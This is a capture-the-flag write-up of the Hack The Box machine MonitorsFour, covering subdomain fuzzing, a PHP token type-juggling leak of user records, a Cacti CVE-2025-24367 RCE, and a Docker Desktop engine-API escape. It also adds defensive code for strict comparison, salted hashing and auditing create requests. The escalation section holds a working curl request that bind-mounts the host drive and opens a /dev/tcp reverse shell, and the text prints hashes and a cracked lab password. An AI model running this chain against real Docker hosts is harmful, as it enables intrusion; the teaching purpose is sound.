Port 80 (monitorsfour.htb)
There is a login page.
Vhost fuzzing

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.129.46.68 -H "Host: FUZZ.monitorsfour.htb" -fs 138
```
A simple vhost fuzz with ffuf gives us cacti.monitorsfour.htb.
The version of Cacti used here is vulnerable to authenticated RCE.
I was lost here, so I looked into my Burp Suite history and found something interesting.
.env was leaking some sensitive information. But sadly these creds did not work.
Directory brute forcing
Directory brute forcing with ffuf reveals a couple of directories.
Among them, user looks interesting.
Visiting the user directory gives an informative error: Missing token parameter.
Based on that error, I passed a token parameter and got a new error: Invalid or missing token.
To check that this parameter name is actually recognised, I tried passing different parameter names and compared the responses.
The different error confirms that token is a valid parameter. The next step is to find a value it accepts.
A simple brute force reveals that the parameter's value is 0, and the response returns sensitive credentials.
```json
[{"id":2,"username":"admin","email":"[email protected]","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},{"id":5,"username":"mwatson","email":"[email protected]","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.00"},{"id":6,"username":"janderson","email":"[email protected]","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},{"id":7,"username":"dthompson","email":"[email protected]","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}]
```
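Why a value of 0 is accepted: three of the leaked tokens are "0e" followed only by digits, and PHP treats such strings as numeric, so under a loose `==` comparison "0" == "0e543210987654321" is true. The page does not show the backend code, so the assumption that the check is a PHP `==` on strings is mine. The Python model below is an added example, not code from the page or from the application; it reproduces the loose comparison, contrasts it with a strict constant-time compare, and uses a USERS table constructed from the token values in the leaked records above.

```python
import hmac
import re

# PHP-style "numeric string": optional surrounding whitespace, optional sign,
# digits with an optional fraction, and an optional exponent.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equals(a: str, b: str) -> bool:
    """Simplified model of PHP's == on two strings (assumption about the backend):
    if both look numeric they are compared as numbers, otherwise as strings."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_equals(a: str, b: str) -> bool:
    """The fix: byte-for-byte comparison (PHP ===), done in constant time
    so response timing does not leak how many leading bytes matched."""
    return hmac.compare_digest(a.encode(), b.encode())


# Constructed table mirroring the token values in the leaked records.
USERS = [
    {"username": "admin", "token": "8024b78f83f102da4f"},
    {"username": "mwatson", "token": "0e543210987654321"},
    {"username": "janderson", "token": "0e999999999999999"},
    {"username": "dthompson", "token": "0e111111111111111"},
]


def users_matching(token: str, compare) -> list:
    """Usernames whose stored token `compare` considers equal to the supplied token."""
    return [u["username"] for u in USERS if compare(token, u["token"])]


if __name__ == "__main__":
    print("loose  ==  :", users_matching("0", php_loose_equals))   # the three 0e... tokens
    print("strict === :", users_matching("0", php_strict_equals))  # nothing
```

The takeaway for the fix is twofold: compare secrets with `===` (or `hash_equals()` in PHP), and generate tokens from a CSPRNG rather than values that can collide with numeric strings.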
Cracking the hashes with CrackStation: only the admin (Marcus) hash is crackable.
Luckily, these creds work for monitorsfour.htb.
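The reason a lookup service can recover these passwords is that the leaked values are unsalted MD5 digests: every account with the same password stores the same value, so a precomputed table answers instantly. The example below is added here and is not the page's or the application's code; it uses a constructed wordlist rather than the leaked hashes, shows the lookup that succeeds against unsalted MD5, and shows a salted, iterated PBKDF2 scheme against which such a table is useless.

```python
import hashlib
import hmac
import os
from typing import Optional

# Constructed wordlist; the hashes from the leaked records are not used here.
WORDLIST = ["password", "letmein", "spring2021", "monitors", "changeme"]


def md5_hex(word: str) -> str:
    """Unsalted MD5 of a password, as the leaked records appear to store it."""
    return hashlib.md5(word.encode()).hexdigest()


def md5_lookup(digest_hex: str, wordlist=WORDLIST) -> Optional[str]:
    """How a lookup table answers: hash each candidate once and compare.
    No salt means the same table serves every site and every user."""
    for word in wordlist:
        if md5_hex(word) == digest_hex:
            return word
    return None


def pbkdf2_hash(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> str:
    """Salted, iterated hash stored as a self-describing string
    'pbkdf2_sha256$iterations$salt$key' (a constructed storage format)."""
    salt = salt or os.urandom(16)
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${key.hex()}"


def pbkdf2_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, key_hex = stored.split("$")
    key = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(key.hex(), key_hex)


def same_password_linkable(password: str, hasher) -> bool:
    """True when two accounts sharing a password end up with identical stored values,
    which is exactly what a precomputed table exploits."""
    return hasher(password) == hasher(password)


if __name__ == "__main__":
    print(md5_lookup(md5_hex("letmein")))                  # letmein
    stored = pbkdf2_hash("letmein")
    print(pbkdf2_verify("letmein", stored))                # True
    print(same_password_linkable("letmein", md5_hex))      # True
    print(same_password_linkable("letmein", pbkdf2_hash))  # False
```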
I found nothing interesting here, so I tried to log in to cacti.monitorsfour.htb, but the creds did not work.
With some tinkering, I found the valid creds for Cacti were marcus:wonderful1. Cacti used the first name as the username.
This web app runs Cacti 1.2.28, which is vulnerable to CVE-2025-24367 (authenticated RCE).
https://www.cve.org/CVERecord?id=CVE-2025-24367
https://medium.com/@929319519qq/cve-2025-24367-exploit-no-code-59aff124d547
Using this GitHub repo, https://github.com/TheCyberGeek/CVE-2025-24367-Cacti-PoC, we get a shell as the user www-data.
We are now inside a Docker container.
User.txt
Privilege Escalation
This is where I was stuck for a long time. When I moved to monitorsfour.htb, there were interesting things in the changelog.
The most important changelog entry was the migration to Docker Desktop 4.44.2.
A simple Google search reveals that this version of Docker Desktop was vulnerable.
https://infosecwriteups.com/only-two-lines-of-code-simple-docker-trick-gives-attackers-host-access-a638293f43ad
https://blog.qwertysecurity.com/Articles/blog3
```bash
curl -X POST -H "Content-Type: application/json" \
    -d '{
        "Image":"docker_setup-nginx-php:latest",
        "Cmd":["bash","-c","bash -i >& /dev/tcp/10.10.14.52/1338 0>&1"],
        "HostConfig":{
            "Binds":["/mnt/host/c:/host_root"]
        }
    }' \
    -o create.json \
    http://192.168.65.7:2375/containers/create
```
```console
$ cid=$(cut -d'"' -f4 create.json)
$ curl -X POST \
    -d '' \
    http://192.168.65.7:2375/containers/$cid/start
root@4245532c8949:/var/www/html# cat /host_root/Users/Administrator/Desktop/root.txt
```
The linked writeup uses wget, but the Docker container we have does not have wget, so we need to tweak the exploit to use curl.
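What made the escalation possible is that an unauthenticated engine API reachable from inside a container accepted a create request that bind-mounts the host filesystem. Beyond not exposing the API to containers at all, a defender can inspect create requests before they reach the engine (a Docker authorization plugin or a proxy in front of the socket receives the same JSON body) and refuse the dangerous ones. The audit function below is an added example, not code from the page or from Docker; SAMPLE_CREATE is constructed to mirror the request above, and SENSITIVE_PREFIXES is an assumed policy list, not a Docker setting.

```python
import json

# Constructed request body, shaped like the containers/create call used above.
SAMPLE_CREATE = """{
  "Image": "docker_setup-nginx-php:latest",
  "Cmd": ["bash", "-c", "bash -i >& /dev/tcp/10.10.14.52/1338 0>&1"],
  "HostConfig": {"Binds": ["/mnt/host/c:/host_root"]}
}"""

# Host paths an unprivileged caller should never be allowed to bind-mount (assumed policy).
SENSITIVE_PREFIXES = ("/mnt/host", "/var/run/docker.sock", "/etc", "/root", "/home", "/proc", "/sys")


def bind_source(bind: str) -> str:
    """Host side of a Docker bind spec 'src:dst[:opts]' (assumes no ':' inside src)."""
    return bind.split(":", 1)[0]


def is_sensitive_path(src: str) -> bool:
    """True for the host root itself or anything under a sensitive prefix."""
    if src == "/":
        return True
    return any(src == p or src.startswith(p + "/") for p in SENSITIVE_PREFIXES)


def audit_create_request(body: str) -> list:
    """Return a list of policy findings for a containers/create body; empty means allowed."""
    findings = []
    req = json.loads(body)
    hc = req.get("HostConfig") or {}

    for bind in hc.get("Binds") or []:
        if is_sensitive_path(bind_source(bind)):
            findings.append(f"sensitive host path bind-mounted: {bind}")

    if hc.get("Privileged"):
        findings.append("Privileged=true")
    for key in ("PidMode", "NetworkMode", "IpcMode"):
        if hc.get(key) == "host":
            findings.append(f"{key}=host shares a host namespace")
    for cap in hc.get("CapAdd") or []:
        if cap.upper() in ("SYS_ADMIN", "ALL"):
            findings.append(f"dangerous capability added: {cap}")

    # Entry command opening a raw TCP stream is a reverse-shell pattern worth flagging.
    cmd = " ".join(req.get("Cmd") or [])
    if "/dev/tcp/" in cmd:
        findings.append("Cmd opens a raw TCP connection via /dev/tcp")
    return findings


if __name__ == "__main__":
    for finding in audit_create_request(SAMPLE_CREATE):
        print("DENY:", finding)
```

Run over the sample body, the checker reports both the host-root bind and the /dev/tcp command; a plain request such as mounting /srv/www read-only into an nginx container produces no findings and would pass.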
Root.txt